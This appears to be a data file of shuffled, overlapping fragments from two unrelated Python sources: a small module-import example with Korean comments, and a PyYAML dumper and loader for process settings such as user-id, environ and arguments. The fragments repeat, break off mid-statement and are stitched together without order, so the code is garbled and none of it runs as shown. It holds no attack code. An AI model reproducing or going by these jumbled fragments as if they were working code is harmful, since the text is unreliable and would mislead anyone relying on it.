EXE_PATH = os.getcwd() # 실행 경로 SCRIPT_PATH = os.path.dirname(os.path.abspath(__file__)) # 스크립트", "second module imported\") def call_function_in_first_module(): print(\"called from second module to first module\") first_module.function_1()", "os.path.dirname(os.path.abspath(__file__)) # 스크립트 경로 UPPER_PATH = os.path.dirname(os.path.abspath(os.path.dirname(__file__))) # 상위 경로 sys.path.append(UPPER_PATH) # 상위", "import os 
import sys EXE_PATH = os.getcwd() # 실행 경로 SCRIPT_PATH = os.path.dirname(os.path.abspath(__file__))", "상위 경로를 추가 from my_tools import first_module # Upper directory 에서 Lower directory", "참조 def function_2(): print(\"function_2 of second module imported\") def call_function_in_first_module(): print(\"called from second", "경로를 추가 from my_tools import first_module # Upper directory 에서 Lower directory 참조", "from second module to first module\") first_module.function_1() if __name__ == \"__main__\": function_2() call_function_in_first_module()" ]
[ "x.pop('kind') yield 'user-id', x.pop('user-id') yield 'group-id', x.pop('group-id') yield 'environ', Map(x.pop('environ')) yield 'memory-limit', x.pop('memory-limit')", "BaseLoader except ImportError: from yaml import SafeDumper as BaseDumper from yaml import SafeLoader", "def tag_map_repr(self, value): return self.represent_mapping('!' + value.__class__.__name__, value.__dict__) def quoted_repr(self, value): return self.represent_scalar('tag:yaml.org,2002:str',", "yaml try: from yaml import CSafeDumper as BaseDumper from yaml import CSafeLoader as", "typ(loader.construct_scalar(node)) else: raise NotImplementedError(node) yaml.add_multi_constructor(\"!\", unknown_type, Loader=Loader) def dump(data, file=None): return yaml.dump(Toplevel(data), file,", "value.__class__.__name__, value.__dict__) def quoted_repr(self, value): return self.represent_scalar('tag:yaml.org,2002:str', str(value), style='\"') class Loader(BaseLoader): pass class", "elif isinstance(node, yaml.SequenceNode): typ = type(tag, (list,), {}) return typ(loader.construct_sequence(node)) elif isinstance(node, yaml.ScalarNode):", "import yaml try: from yaml import CSafeDumper as BaseDumper from yaml import CSafeLoader", "value, flow_style=False) def map_repr(self, value): return self.represent_mapping('tag:yaml.org,2002:map', sorted((k, Quoted(v)) for k, v in", "Loader=Loader) def dump(data, file=None): return yaml.dump(Toplevel(data), file, Dumper=Dumper) def read(filename): with open(str(filename)) as", "typ = type(tag, (str,), {}) return typ(loader.construct_scalar(node)) else: raise NotImplementedError(node) yaml.add_multi_constructor(\"!\", unknown_type, Loader=Loader)", "Dumper=Dumper) yaml.add_representer(Map, Dumper.map_repr, Dumper=Dumper) yaml.add_representer(Quoted, Dumper.quoted_repr, Dumper=Dumper) def unknown_type(loader, tag, node): if isinstance(node,", "return self.represent_mapping('tag:yaml.org,2002:map', value.format(), flow_style=False) def list_repr(self, value): return 
self.represent_sequence('tag:yaml.org,2002:seq', value, flow_style=False) def map_repr(self,", "yaml import SafeLoader as BaseLoader class Dumper(BaseDumper): def statedir_repr(self, value): return self.represent_mapping('!Statedir', value.__dict__)", "CSafeDumper as BaseDumper from yaml import CSafeLoader as BaseLoader except ImportError: from yaml", "from yaml import SafeLoader as BaseLoader class Dumper(BaseDumper): def statedir_repr(self, value): return self.represent_mapping('!Statedir',", "def unknown_type(loader, tag, node): if isinstance(node, yaml.MappingNode): typ = type(tag, (object,), { '__init__':", "style='\"') class Loader(BaseLoader): pass class Statedir(object): pass # Formatting class List(list): pass class", "value.items()), flow_style=False) def tag_map_repr(self, value): return self.represent_mapping('!' + value.__class__.__name__, value.__dict__) def quoted_repr(self, value):", "Dumper.statedir_repr, Dumper=Dumper) yaml.add_representer(Toplevel, Dumper.toplevel_repr, Dumper=Dumper) yaml.add_representer(List, Dumper.list_repr, Dumper=Dumper) yaml.add_representer(Map, Dumper.map_repr, Dumper=Dumper) yaml.add_representer(Quoted, Dumper.quoted_repr,", "lambda self, **kwargs: self.__dict__.update(kwargs), '__eq__': lambda self, other: self.__dict__ == other.__dict__, }) yaml.add_representer(typ,", "self.__dict__ == other.__dict__, }) yaml.add_representer(typ, Dumper.tag_map_repr, Dumper=Dumper) return typ(**loader.construct_mapping(node)) elif isinstance(node, yaml.SequenceNode): typ", "sorted((k, Quoted(v)) for k, v in value.items()), flow_style=False) def tag_map_repr(self, value): return self.represent_mapping('!'", "yaml.add_representer(List, Dumper.list_repr, Dumper=Dumper) yaml.add_representer(Map, Dumper.map_repr, Dumper=Dumper) yaml.add_representer(Quoted, Dumper.quoted_repr, Dumper=Dumper) def unknown_type(loader, tag, node):", "yaml.add_representer(Statedir, Dumper.statedir_repr, Dumper=Dumper) yaml.add_representer(Toplevel, 
Dumper.toplevel_repr, Dumper=Dumper) yaml.add_representer(List, Dumper.list_repr, Dumper=Dumper) yaml.add_representer(Map, Dumper.map_repr, Dumper=Dumper) yaml.add_representer(Quoted,", "}) yaml.add_representer(typ, Dumper.tag_map_repr, Dumper=Dumper) return typ(**loader.construct_mapping(node)) elif isinstance(node, yaml.SequenceNode): typ = type(tag, (list,),", "typ = type(tag, (object,), { '__init__': lambda self, **kwargs: self.__dict__.update(kwargs), '__eq__': lambda self,", "x.pop('user-id') yield 'group-id', x.pop('group-id') yield 'environ', Map(x.pop('environ')) yield 'memory-limit', x.pop('memory-limit') yield 'fileno-limit', x.pop('fileno-limit')", "pass # Formatting class List(list): pass class Map(dict): pass class Quoted(str): pass class", "'memory-limit', x.pop('memory-limit') yield 'fileno-limit', x.pop('fileno-limit') yield 'cpu-shares', x.pop('cpu-shares') yield 'workdir', x.pop('workdir', '/') yield", "in value.items()), flow_style=False) def tag_map_repr(self, value): return self.represent_mapping('!' + value.__class__.__name__, value.__dict__) def quoted_repr(self,", "BaseLoader class Dumper(BaseDumper): def statedir_repr(self, value): return self.represent_mapping('!Statedir', value.__dict__) def toplevel_repr(self, value): return", "k, v in value.items()), flow_style=False) def tag_map_repr(self, value): return self.represent_mapping('!' 
+ value.__class__.__name__, value.__dict__)", "class Statedir(object): pass # Formatting class List(list): pass class Map(dict): pass class Quoted(str):", "yield k, v yaml.add_representer(Statedir, Dumper.statedir_repr, Dumper=Dumper) yaml.add_representer(Toplevel, Dumper.toplevel_repr, Dumper=Dumper) yaml.add_representer(List, Dumper.list_repr, Dumper=Dumper) yaml.add_representer(Map,", "= type(tag, (object,), { '__init__': lambda self, **kwargs: self.__dict__.update(kwargs), '__eq__': lambda self, other:", "def quoted_repr(self, value): return self.represent_scalar('tag:yaml.org,2002:str', str(value), style='\"') class Loader(BaseLoader): pass class Statedir(object): pass", "yield 'group-id', x.pop('group-id') yield 'environ', Map(x.pop('environ')) yield 'memory-limit', x.pop('memory-limit') yield 'fileno-limit', x.pop('fileno-limit') yield", "unknown_type(loader, tag, node): if isinstance(node, yaml.MappingNode): typ = type(tag, (object,), { '__init__': lambda", "return typ(loader.construct_sequence(node)) elif isinstance(node, yaml.ScalarNode): typ = type(tag, (str,), {}) return typ(loader.construct_scalar(node)) else:", "self.copy() yield 'kind', x.pop('kind') yield 'user-id', x.pop('user-id') yield 'group-id', x.pop('group-id') yield 'environ', Map(x.pop('environ'))", "Quoted(v)) for k, v in value.items()), flow_style=False) def tag_map_repr(self, value): return self.represent_mapping('!' 
+", "**kwargs: self.__dict__.update(kwargs), '__eq__': lambda self, other: self.__dict__ == other.__dict__, }) yaml.add_representer(typ, Dumper.tag_map_repr, Dumper=Dumper)", "self.represent_scalar('tag:yaml.org,2002:str', str(value), style='\"') class Loader(BaseLoader): pass class Statedir(object): pass # Formatting class List(list):", "<gh_stars>1-10 import yaml try: from yaml import CSafeDumper as BaseDumper from yaml import", "yaml.add_representer(typ, Dumper.tag_map_repr, Dumper=Dumper) return typ(**loader.construct_mapping(node)) elif isinstance(node, yaml.SequenceNode): typ = type(tag, (list,), {})", "if isinstance(node, yaml.MappingNode): typ = type(tag, (object,), { '__init__': lambda self, **kwargs: self.__dict__.update(kwargs),", "typ(**loader.construct_mapping(node)) elif isinstance(node, yaml.SequenceNode): typ = type(tag, (list,), {}) return typ(loader.construct_sequence(node)) elif isinstance(node,", "type(tag, (object,), { '__init__': lambda self, **kwargs: self.__dict__.update(kwargs), '__eq__': lambda self, other: self.__dict__", "as BaseLoader class Dumper(BaseDumper): def statedir_repr(self, value): return self.represent_mapping('!Statedir', value.__dict__) def toplevel_repr(self, value):", "v in value.items()), flow_style=False) def tag_map_repr(self, value): return self.represent_mapping('!' 
+ value.__class__.__name__, value.__dict__) def", "Formatting class List(list): pass class Map(dict): pass class Quoted(str): pass class Toplevel(dict): def", "other: self.__dict__ == other.__dict__, }) yaml.add_representer(typ, Dumper.tag_map_repr, Dumper=Dumper) return typ(**loader.construct_mapping(node)) elif isinstance(node, yaml.SequenceNode):", "Dumper=Dumper) return typ(**loader.construct_mapping(node)) elif isinstance(node, yaml.SequenceNode): typ = type(tag, (list,), {}) return typ(loader.construct_sequence(node))", "{}) return typ(loader.construct_scalar(node)) else: raise NotImplementedError(node) yaml.add_multi_constructor(\"!\", unknown_type, Loader=Loader) def dump(data, file=None): return", "return typ(loader.construct_scalar(node)) else: raise NotImplementedError(node) yaml.add_multi_constructor(\"!\", unknown_type, Loader=Loader) def dump(data, file=None): return yaml.dump(Toplevel(data),", "class Quoted(str): pass class Toplevel(dict): def format(self): x = self.copy() yield 'kind', x.pop('kind')", "yaml.add_representer(Toplevel, Dumper.toplevel_repr, Dumper=Dumper) yaml.add_representer(List, Dumper.list_repr, Dumper=Dumper) yaml.add_representer(Map, Dumper.map_repr, Dumper=Dumper) yaml.add_representer(Quoted, Dumper.quoted_repr, Dumper=Dumper) def", "'workdir', x.pop('workdir', '/') yield 'executable', x.pop('executable') yield 'arguments', List(map(Quoted, x.pop('arguments'))) for k, v", "List(map(Quoted, x.pop('arguments'))) for k, v in x.items(): yield k, v yaml.add_representer(Statedir, Dumper.statedir_repr, Dumper=Dumper)", "class Dumper(BaseDumper): def statedir_repr(self, value): return self.represent_mapping('!Statedir', value.__dict__) def toplevel_repr(self, value): return self.represent_mapping('tag:yaml.org,2002:map',", "lambda self, other: self.__dict__ == other.__dict__, }) yaml.add_representer(typ, Dumper.tag_map_repr, Dumper=Dumper) return typ(**loader.construct_mapping(node)) elif", "self.represent_mapping('!Statedir', 
value.__dict__) def toplevel_repr(self, value): return self.represent_mapping('tag:yaml.org,2002:map', value.format(), flow_style=False) def list_repr(self, value): return", "CSafeLoader as BaseLoader except ImportError: from yaml import SafeDumper as BaseDumper from yaml", "SafeLoader as BaseLoader class Dumper(BaseDumper): def statedir_repr(self, value): return self.represent_mapping('!Statedir', value.__dict__) def toplevel_repr(self,", "except ImportError: from yaml import SafeDumper as BaseDumper from yaml import SafeLoader as", "as BaseDumper from yaml import CSafeLoader as BaseLoader except ImportError: from yaml import", "SafeDumper as BaseDumper from yaml import SafeLoader as BaseLoader class Dumper(BaseDumper): def statedir_repr(self,", "k, v yaml.add_representer(Statedir, Dumper.statedir_repr, Dumper=Dumper) yaml.add_representer(Toplevel, Dumper.toplevel_repr, Dumper=Dumper) yaml.add_representer(List, Dumper.list_repr, Dumper=Dumper) yaml.add_representer(Map, Dumper.map_repr,", "'__init__': lambda self, **kwargs: self.__dict__.update(kwargs), '__eq__': lambda self, other: self.__dict__ == other.__dict__, })", "pass class Statedir(object): pass # Formatting class List(list): pass class Map(dict): pass class", "file=None): return yaml.dump(Toplevel(data), file, Dumper=Dumper) def read(filename): with open(str(filename)) as f: return yaml.load(f,", "yaml import SafeDumper as BaseDumper from yaml import SafeLoader as BaseLoader class Dumper(BaseDumper):", "value): return self.represent_mapping('!' 
+ value.__class__.__name__, value.__dict__) def quoted_repr(self, value): return self.represent_scalar('tag:yaml.org,2002:str', str(value), style='\"')", "other.__dict__, }) yaml.add_representer(typ, Dumper.tag_map_repr, Dumper=Dumper) return typ(**loader.construct_mapping(node)) elif isinstance(node, yaml.SequenceNode): typ = type(tag,", "from yaml import CSafeDumper as BaseDumper from yaml import CSafeLoader as BaseLoader except", "x.pop('fileno-limit') yield 'cpu-shares', x.pop('cpu-shares') yield 'workdir', x.pop('workdir', '/') yield 'executable', x.pop('executable') yield 'arguments',", "as BaseDumper from yaml import SafeLoader as BaseLoader class Dumper(BaseDumper): def statedir_repr(self, value):", "'/') yield 'executable', x.pop('executable') yield 'arguments', List(map(Quoted, x.pop('arguments'))) for k, v in x.items():", "return self.represent_sequence('tag:yaml.org,2002:seq', value, flow_style=False) def map_repr(self, value): return self.represent_mapping('tag:yaml.org,2002:map', sorted((k, Quoted(v)) for k,", "Map(dict): pass class Quoted(str): pass class Toplevel(dict): def format(self): x = self.copy() yield", "pass class Toplevel(dict): def format(self): x = self.copy() yield 'kind', x.pop('kind') yield 'user-id',", "Quoted(str): pass class Toplevel(dict): def format(self): x = self.copy() yield 'kind', x.pop('kind') yield", "self.__dict__.update(kwargs), '__eq__': lambda self, other: self.__dict__ == other.__dict__, }) yaml.add_representer(typ, Dumper.tag_map_repr, Dumper=Dumper) return", "'arguments', List(map(Quoted, x.pop('arguments'))) for k, v in x.items(): yield k, v yaml.add_representer(Statedir, Dumper.statedir_repr,", "tag_map_repr(self, value): return self.represent_mapping('!' 
+ value.__class__.__name__, value.__dict__) def quoted_repr(self, value): return self.represent_scalar('tag:yaml.org,2002:str', str(value),", "Dumper.list_repr, Dumper=Dumper) yaml.add_representer(Map, Dumper.map_repr, Dumper=Dumper) yaml.add_representer(Quoted, Dumper.quoted_repr, Dumper=Dumper) def unknown_type(loader, tag, node): if", "yaml.add_representer(Map, Dumper.map_repr, Dumper=Dumper) yaml.add_representer(Quoted, Dumper.quoted_repr, Dumper=Dumper) def unknown_type(loader, tag, node): if isinstance(node, yaml.MappingNode):", "type(tag, (list,), {}) return typ(loader.construct_sequence(node)) elif isinstance(node, yaml.ScalarNode): typ = type(tag, (str,), {})", "= type(tag, (str,), {}) return typ(loader.construct_scalar(node)) else: raise NotImplementedError(node) yaml.add_multi_constructor(\"!\", unknown_type, Loader=Loader) def", "toplevel_repr(self, value): return self.represent_mapping('tag:yaml.org,2002:map', value.format(), flow_style=False) def list_repr(self, value): return self.represent_sequence('tag:yaml.org,2002:seq', value, flow_style=False)", "return self.represent_scalar('tag:yaml.org,2002:str', str(value), style='\"') class Loader(BaseLoader): pass class Statedir(object): pass # Formatting class", "list_repr(self, value): return self.represent_sequence('tag:yaml.org,2002:seq', value, flow_style=False) def map_repr(self, value): return self.represent_mapping('tag:yaml.org,2002:map', sorted((k, Quoted(v))", "= type(tag, (list,), {}) return typ(loader.construct_sequence(node)) elif isinstance(node, yaml.ScalarNode): typ = type(tag, (str,),", "return yaml.dump(Toplevel(data), file, Dumper=Dumper) def read(filename): with open(str(filename)) as f: return yaml.load(f, Loader=Loader)", "self, other: self.__dict__ == other.__dict__, }) yaml.add_representer(typ, Dumper.tag_map_repr, Dumper=Dumper) return typ(**loader.construct_mapping(node)) elif isinstance(node,", "Dumper.tag_map_repr, Dumper=Dumper) return typ(**loader.construct_mapping(node)) 
elif isinstance(node, yaml.SequenceNode): typ = type(tag, (list,), {}) return", "statedir_repr(self, value): return self.represent_mapping('!Statedir', value.__dict__) def toplevel_repr(self, value): return self.represent_mapping('tag:yaml.org,2002:map', value.format(), flow_style=False) def", "map_repr(self, value): return self.represent_mapping('tag:yaml.org,2002:map', sorted((k, Quoted(v)) for k, v in value.items()), flow_style=False) def", "{}) return typ(loader.construct_sequence(node)) elif isinstance(node, yaml.ScalarNode): typ = type(tag, (str,), {}) return typ(loader.construct_scalar(node))", "value.format(), flow_style=False) def list_repr(self, value): return self.represent_sequence('tag:yaml.org,2002:seq', value, flow_style=False) def map_repr(self, value): return", "class Toplevel(dict): def format(self): x = self.copy() yield 'kind', x.pop('kind') yield 'user-id', x.pop('user-id')", "x.pop('executable') yield 'arguments', List(map(Quoted, x.pop('arguments'))) for k, v in x.items(): yield k, v", "value): return self.represent_scalar('tag:yaml.org,2002:str', str(value), style='\"') class Loader(BaseLoader): pass class Statedir(object): pass # Formatting", "k, v in x.items(): yield k, v yaml.add_representer(Statedir, Dumper.statedir_repr, Dumper=Dumper) yaml.add_representer(Toplevel, Dumper.toplevel_repr, Dumper=Dumper)", "x.pop('memory-limit') yield 'fileno-limit', x.pop('fileno-limit') yield 'cpu-shares', x.pop('cpu-shares') yield 'workdir', x.pop('workdir', '/') yield 'executable',", "yield 'cpu-shares', x.pop('cpu-shares') yield 'workdir', x.pop('workdir', '/') yield 'executable', x.pop('executable') yield 'arguments', List(map(Quoted,", "node): if isinstance(node, yaml.MappingNode): typ = type(tag, (object,), { '__init__': lambda self, **kwargs:", "typ(loader.construct_sequence(node)) elif isinstance(node, yaml.ScalarNode): typ = type(tag, (str,), {}) return typ(loader.construct_scalar(node)) else: raise", "def dump(data, file=None): return 
yaml.dump(Toplevel(data), file, Dumper=Dumper) def read(filename): with open(str(filename)) as f:", "yield 'arguments', List(map(Quoted, x.pop('arguments'))) for k, v in x.items(): yield k, v yaml.add_representer(Statedir,", "isinstance(node, yaml.MappingNode): typ = type(tag, (object,), { '__init__': lambda self, **kwargs: self.__dict__.update(kwargs), '__eq__':", "yaml.add_multi_constructor(\"!\", unknown_type, Loader=Loader) def dump(data, file=None): return yaml.dump(Toplevel(data), file, Dumper=Dumper) def read(filename): with", "flow_style=False) def tag_map_repr(self, value): return self.represent_mapping('!' + value.__class__.__name__, value.__dict__) def quoted_repr(self, value): return", "yield 'executable', x.pop('executable') yield 'arguments', List(map(Quoted, x.pop('arguments'))) for k, v in x.items(): yield", "yaml import CSafeLoader as BaseLoader except ImportError: from yaml import SafeDumper as BaseDumper", "as BaseLoader except ImportError: from yaml import SafeDumper as BaseDumper from yaml import", "value): return self.represent_mapping('!Statedir', value.__dict__) def toplevel_repr(self, value): return self.represent_mapping('tag:yaml.org,2002:map', value.format(), flow_style=False) def list_repr(self,", "import SafeDumper as BaseDumper from yaml import SafeLoader as BaseLoader class Dumper(BaseDumper): def", "pass class Quoted(str): pass class Toplevel(dict): def format(self): x = self.copy() yield 'kind',", "def list_repr(self, value): return self.represent_sequence('tag:yaml.org,2002:seq', value, flow_style=False) def map_repr(self, value): return self.represent_mapping('tag:yaml.org,2002:map', sorted((k,", "yield 'environ', Map(x.pop('environ')) yield 'memory-limit', x.pop('memory-limit') yield 'fileno-limit', x.pop('fileno-limit') yield 'cpu-shares', x.pop('cpu-shares') yield", "(list,), {}) return typ(loader.construct_sequence(node)) elif isinstance(node, yaml.ScalarNode): typ = type(tag, (str,), {}) return", "def statedir_repr(self, 
value): return self.represent_mapping('!Statedir', value.__dict__) def toplevel_repr(self, value): return self.represent_mapping('tag:yaml.org,2002:map', value.format(), flow_style=False)", "value.__dict__) def quoted_repr(self, value): return self.represent_scalar('tag:yaml.org,2002:str', str(value), style='\"') class Loader(BaseLoader): pass class Statedir(object):", "value): return self.represent_mapping('tag:yaml.org,2002:map', value.format(), flow_style=False) def list_repr(self, value): return self.represent_sequence('tag:yaml.org,2002:seq', value, flow_style=False) def", "# Formatting class List(list): pass class Map(dict): pass class Quoted(str): pass class Toplevel(dict):", "format(self): x = self.copy() yield 'kind', x.pop('kind') yield 'user-id', x.pop('user-id') yield 'group-id', x.pop('group-id')", "== other.__dict__, }) yaml.add_representer(typ, Dumper.tag_map_repr, Dumper=Dumper) return typ(**loader.construct_mapping(node)) elif isinstance(node, yaml.SequenceNode): typ =", "Dumper=Dumper) yaml.add_representer(Quoted, Dumper.quoted_repr, Dumper=Dumper) def unknown_type(loader, tag, node): if isinstance(node, yaml.MappingNode): typ =", "return typ(**loader.construct_mapping(node)) elif isinstance(node, yaml.SequenceNode): typ = type(tag, (list,), {}) return typ(loader.construct_sequence(node)) elif", "BaseDumper from yaml import SafeLoader as BaseLoader class Dumper(BaseDumper): def statedir_repr(self, value): return", "yaml.SequenceNode): typ = type(tag, (list,), {}) return typ(loader.construct_sequence(node)) elif isinstance(node, yaml.ScalarNode): typ =", "Dumper.quoted_repr, Dumper=Dumper) def unknown_type(loader, tag, node): if isinstance(node, yaml.MappingNode): typ = type(tag, (object,),", "isinstance(node, yaml.SequenceNode): typ = type(tag, (list,), {}) return typ(loader.construct_sequence(node)) elif isinstance(node, yaml.ScalarNode): typ", "+ value.__class__.__name__, value.__dict__) def quoted_repr(self, value): return 
self.represent_scalar('tag:yaml.org,2002:str', str(value), style='\"') class Loader(BaseLoader): pass", "from yaml import CSafeLoader as BaseLoader except ImportError: from yaml import SafeDumper as", "BaseDumper from yaml import CSafeLoader as BaseLoader except ImportError: from yaml import SafeDumper", "return self.represent_mapping('!Statedir', value.__dict__) def toplevel_repr(self, value): return self.represent_mapping('tag:yaml.org,2002:map', value.format(), flow_style=False) def list_repr(self, value):", "v in x.items(): yield k, v yaml.add_representer(Statedir, Dumper.statedir_repr, Dumper=Dumper) yaml.add_representer(Toplevel, Dumper.toplevel_repr, Dumper=Dumper) yaml.add_representer(List,", "self, **kwargs: self.__dict__.update(kwargs), '__eq__': lambda self, other: self.__dict__ == other.__dict__, }) yaml.add_representer(typ, Dumper.tag_map_repr,", "x = self.copy() yield 'kind', x.pop('kind') yield 'user-id', x.pop('user-id') yield 'group-id', x.pop('group-id') yield", "yield 'kind', x.pop('kind') yield 'user-id', x.pop('user-id') yield 'group-id', x.pop('group-id') yield 'environ', Map(x.pop('environ')) yield", "for k, v in value.items()), flow_style=False) def tag_map_repr(self, value): return self.represent_mapping('!' 
+ value.__class__.__name__,", "Dumper=Dumper) yaml.add_representer(Toplevel, Dumper.toplevel_repr, Dumper=Dumper) yaml.add_representer(List, Dumper.list_repr, Dumper=Dumper) yaml.add_representer(Map, Dumper.map_repr, Dumper=Dumper) yaml.add_representer(Quoted, Dumper.quoted_repr, Dumper=Dumper)", "(str,), {}) return typ(loader.construct_scalar(node)) else: raise NotImplementedError(node) yaml.add_multi_constructor(\"!\", unknown_type, Loader=Loader) def dump(data, file=None):", "x.pop('arguments'))) for k, v in x.items(): yield k, v yaml.add_representer(Statedir, Dumper.statedir_repr, Dumper=Dumper) yaml.add_representer(Toplevel,", "unknown_type, Loader=Loader) def dump(data, file=None): return yaml.dump(Toplevel(data), file, Dumper=Dumper) def read(filename): with open(str(filename))", "in x.items(): yield k, v yaml.add_representer(Statedir, Dumper.statedir_repr, Dumper=Dumper) yaml.add_representer(Toplevel, Dumper.toplevel_repr, Dumper=Dumper) yaml.add_representer(List, Dumper.list_repr,", "yield 'memory-limit', x.pop('memory-limit') yield 'fileno-limit', x.pop('fileno-limit') yield 'cpu-shares', x.pop('cpu-shares') yield 'workdir', x.pop('workdir', '/')", "x.items(): yield k, v yaml.add_representer(Statedir, Dumper.statedir_repr, Dumper=Dumper) yaml.add_representer(Toplevel, Dumper.toplevel_repr, Dumper=Dumper) yaml.add_representer(List, Dumper.list_repr, Dumper=Dumper)", "else: raise NotImplementedError(node) yaml.add_multi_constructor(\"!\", unknown_type, Loader=Loader) def dump(data, file=None): return yaml.dump(Toplevel(data), file, Dumper=Dumper)", "yaml.MappingNode): typ = type(tag, (object,), { '__init__': lambda self, **kwargs: self.__dict__.update(kwargs), '__eq__': lambda", "yaml import CSafeDumper as BaseDumper from yaml import CSafeLoader as BaseLoader except ImportError:", "'__eq__': lambda self, other: self.__dict__ == other.__dict__, }) yaml.add_representer(typ, Dumper.tag_map_repr, Dumper=Dumper) return typ(**loader.construct_mapping(node))", 
"import SafeLoader as BaseLoader class Dumper(BaseDumper): def statedir_repr(self, value): return self.represent_mapping('!Statedir', value.__dict__) def", "class Map(dict): pass class Quoted(str): pass class Toplevel(dict): def format(self): x = self.copy()", "(object,), { '__init__': lambda self, **kwargs: self.__dict__.update(kwargs), '__eq__': lambda self, other: self.__dict__ ==", "NotImplementedError(node) yaml.add_multi_constructor(\"!\", unknown_type, Loader=Loader) def dump(data, file=None): return yaml.dump(Toplevel(data), file, Dumper=Dumper) def read(filename):", "self.represent_mapping('tag:yaml.org,2002:map', sorted((k, Quoted(v)) for k, v in value.items()), flow_style=False) def tag_map_repr(self, value): return", "ImportError: from yaml import SafeDumper as BaseDumper from yaml import SafeLoader as BaseLoader", "return self.represent_mapping('tag:yaml.org,2002:map', sorted((k, Quoted(v)) for k, v in value.items()), flow_style=False) def tag_map_repr(self, value):", "elif isinstance(node, yaml.ScalarNode): typ = type(tag, (str,), {}) return typ(loader.construct_scalar(node)) else: raise NotImplementedError(node)", "for k, v in x.items(): yield k, v yaml.add_representer(Statedir, Dumper.statedir_repr, Dumper=Dumper) yaml.add_representer(Toplevel, Dumper.toplevel_repr,", "value): return self.represent_mapping('tag:yaml.org,2002:map', sorted((k, Quoted(v)) for k, v in value.items()), flow_style=False) def tag_map_repr(self,", "import CSafeLoader as BaseLoader except ImportError: from yaml import SafeDumper as BaseDumper from", "self.represent_mapping('!' 
+ value.__class__.__name__, value.__dict__) def quoted_repr(self, value): return self.represent_scalar('tag:yaml.org,2002:str', str(value), style='\"') class Loader(BaseLoader):", "def toplevel_repr(self, value): return self.represent_mapping('tag:yaml.org,2002:map', value.format(), flow_style=False) def list_repr(self, value): return self.represent_sequence('tag:yaml.org,2002:seq', value,", "x.pop('cpu-shares') yield 'workdir', x.pop('workdir', '/') yield 'executable', x.pop('executable') yield 'arguments', List(map(Quoted, x.pop('arguments'))) for", "self.represent_mapping('tag:yaml.org,2002:map', value.format(), flow_style=False) def list_repr(self, value): return self.represent_sequence('tag:yaml.org,2002:seq', value, flow_style=False) def map_repr(self, value):", "from yaml import SafeDumper as BaseDumper from yaml import SafeLoader as BaseLoader class", "x.pop('workdir', '/') yield 'executable', x.pop('executable') yield 'arguments', List(map(Quoted, x.pop('arguments'))) for k, v in", "Dumper(BaseDumper): def statedir_repr(self, value): return self.represent_mapping('!Statedir', value.__dict__) def toplevel_repr(self, value): return self.represent_mapping('tag:yaml.org,2002:map', value.format(),", "return self.represent_mapping('!' 
+ value.__class__.__name__, value.__dict__) def quoted_repr(self, value): return self.represent_scalar('tag:yaml.org,2002:str', str(value), style='\"') class", "typ = type(tag, (list,), {}) return typ(loader.construct_sequence(node)) elif isinstance(node, yaml.ScalarNode): typ = type(tag,", "flow_style=False) def list_repr(self, value): return self.represent_sequence('tag:yaml.org,2002:seq', value, flow_style=False) def map_repr(self, value): return self.represent_mapping('tag:yaml.org,2002:map',", "type(tag, (str,), {}) return typ(loader.construct_scalar(node)) else: raise NotImplementedError(node) yaml.add_multi_constructor(\"!\", unknown_type, Loader=Loader) def dump(data,", "isinstance(node, yaml.ScalarNode): typ = type(tag, (str,), {}) return typ(loader.construct_scalar(node)) else: raise NotImplementedError(node) yaml.add_multi_constructor(\"!\",", "= self.copy() yield 'kind', x.pop('kind') yield 'user-id', x.pop('user-id') yield 'group-id', x.pop('group-id') yield 'environ',", "yield 'fileno-limit', x.pop('fileno-limit') yield 'cpu-shares', x.pop('cpu-shares') yield 'workdir', x.pop('workdir', '/') yield 'executable', x.pop('executable')", "List(list): pass class Map(dict): pass class Quoted(str): pass class Toplevel(dict): def format(self): x", "def format(self): x = self.copy() yield 'kind', x.pop('kind') yield 'user-id', x.pop('user-id') yield 'group-id',", "yaml.ScalarNode): typ = type(tag, (str,), {}) return typ(loader.construct_scalar(node)) else: raise NotImplementedError(node) yaml.add_multi_constructor(\"!\", unknown_type,", "Statedir(object): pass # Formatting class List(list): pass class Map(dict): pass class Quoted(str): pass", "self.represent_sequence('tag:yaml.org,2002:seq', value, flow_style=False) def map_repr(self, value): return self.represent_mapping('tag:yaml.org,2002:map', sorted((k, Quoted(v)) for k, v", "tag, node): if isinstance(node, yaml.MappingNode): typ = type(tag, (object,), { '__init__': lambda self,", "Toplevel(dict): def 
format(self): x = self.copy() yield 'kind', x.pop('kind') yield 'user-id', x.pop('user-id') yield", "'cpu-shares', x.pop('cpu-shares') yield 'workdir', x.pop('workdir', '/') yield 'executable', x.pop('executable') yield 'arguments', List(map(Quoted, x.pop('arguments')))", "pass class Map(dict): pass class Quoted(str): pass class Toplevel(dict): def format(self): x =", "Dumper=Dumper) def unknown_type(loader, tag, node): if isinstance(node, yaml.MappingNode): typ = type(tag, (object,), {", "raise NotImplementedError(node) yaml.add_multi_constructor(\"!\", unknown_type, Loader=Loader) def dump(data, file=None): return yaml.dump(Toplevel(data), file, Dumper=Dumper) def", "dump(data, file=None): return yaml.dump(Toplevel(data), file, Dumper=Dumper) def read(filename): with open(str(filename)) as f: return", "class Loader(BaseLoader): pass class Statedir(object): pass # Formatting class List(list): pass class Map(dict):", "Map(x.pop('environ')) yield 'memory-limit', x.pop('memory-limit') yield 'fileno-limit', x.pop('fileno-limit') yield 'cpu-shares', x.pop('cpu-shares') yield 'workdir', x.pop('workdir',", "yield 'workdir', x.pop('workdir', '/') yield 'executable', x.pop('executable') yield 'arguments', List(map(Quoted, x.pop('arguments'))) for k,", "def map_repr(self, value): return self.represent_mapping('tag:yaml.org,2002:map', sorted((k, Quoted(v)) for k, v in value.items()), flow_style=False)", "yaml.add_representer(Quoted, Dumper.quoted_repr, Dumper=Dumper) def unknown_type(loader, tag, node): if isinstance(node, yaml.MappingNode): typ = type(tag,", "'executable', x.pop('executable') yield 'arguments', List(map(Quoted, x.pop('arguments'))) for k, v in x.items(): yield k,", "quoted_repr(self, value): return self.represent_scalar('tag:yaml.org,2002:str', str(value), style='\"') class Loader(BaseLoader): pass class Statedir(object): pass #", "'fileno-limit', x.pop('fileno-limit') yield 'cpu-shares', x.pop('cpu-shares') yield 'workdir', x.pop('workdir', '/') yield 
